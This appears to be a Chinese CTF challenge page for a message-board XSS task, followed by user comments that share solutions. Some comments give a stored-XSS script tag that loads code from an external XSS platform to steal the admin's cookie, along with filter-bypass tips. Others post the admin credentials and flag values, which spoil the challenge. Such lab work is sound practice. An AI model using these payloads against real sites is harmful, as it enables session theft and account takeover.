留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 2916
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
playmaker 2年前
举报

看评论区方法:1、xss平台,发现获取的是空cookie;2、admin登录:不知道密码,用评论区密码确实可以,但我不知道怎么获得的,故不使用。 自己的方法:直接chrome分析发完评论network元素,直接找到cookie。。

回复 1
千言旅人 2年前
举报

有过滤()'",选插入图片,正常来说填图片链接<Img sRC=//baidu.com/test.jpg>,但是本题已经提供了img标签和http://的头,那插入的时候图片链接就写baidu.com/test.jpg就行。这时发现有回显但是多次尝试后没有收到cookie。 翻评论区拿前辈账密登录admin.php,进去后发现后台管理员看到的内容其实是没有进行过滤()'&q

回复 1
yangc 2年前
举报

1.在xss平台上注册,建项目,生成xss语句。 2.在留言框内插入xss语句。 3.在xss平台收到cookie,得到flag。 4.将收到的flag进行在线URI解码。

回复 1
神里凌华 2年前
举报

5金币做完给3金OuO

回复 1
晚风 2年前
举报

flag{211d9b5b0ae2f9adfc8136e7a8d5aa3d}后面跟上/admin.php user: admin password: 011be4d65feac1a8登录,检查,找到相应的位置就能看见flag

回复 0
piying 2年前
举报

思路:登录XSS平台https://xss.pt/,将如下代码植入<sCRiPt sRC=//i0.al/qUc5></sCrIpT>留言框,点击雁过留声,路过留言;在XSS平台查看得到flag,然后URL解码,得到flag{2276f57f5da12355e4525c634337aa06}

回复 1
107zsm 2年前
举报

UrlEncode编码/解码

回复 0
几度夕阳红 2年前
举报

我认为的正常思路:1、在留言板插入XSS代码 2、管理员观看留言,触发XSS代码 3、XSS平台接收到管理员cookie信息,这里的cookie就是flag。但是不知道靶场是否实现了管理员触发XSS的机制,XSS平台一直未接收到信息。大家伙的解法,使用工具扫描网站,发现admin.php,和你大概率扫不到的db.sql文件,db.sql有admin的账号密码。登录admin界面,会触发你写入的XS

回复 2
Robuntu 1年前
举报

@harry 大佬,我用的xss平台一直没有收到信息,请问是payload的问题吗

回复 0
harry 管理员 2年前
举报

已经实现了管理员触发XSS的机制

回复 2
星之队队大队长 2年前
举报

先输入payload 然后 admin.php user: admin password: 011be4d65feac1a8 登录即可

回复 1
问题小子 2年前
举报

纯小白,这道题怎么做啊

回复 2

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(17)

解题动态

Lmn13644482831 攻破了该题 15小时前
testkuber 攻破了该题 23小时前
vespercc 攻破了该题 23小时前
2457036664 攻破了该题 1天前
2790819062 攻破了该题 1天前
lunarbyside 攻破了该题 2天前
lon 攻破了该题 2天前
SUSAN777 攻破了该题 3天前
trapping 攻破了该题 3天前
派大星和海绵宝宝 攻破了该题 3天前
forces 攻破了该题 4天前
Eplum 攻破了该题 4天前
17807032991 攻破了该题 6天前
2424291222 攻破了该题 6天前
2424291112 攻破了该题 6天前
qianxin66 攻破了该题 7天前
TOTO1024 攻破了该题 7天前
Zhumeng 攻破了该题 7天前
2687821343 攻破了该题 8天前
Pixelw 攻破了该题 9天前
问题反馈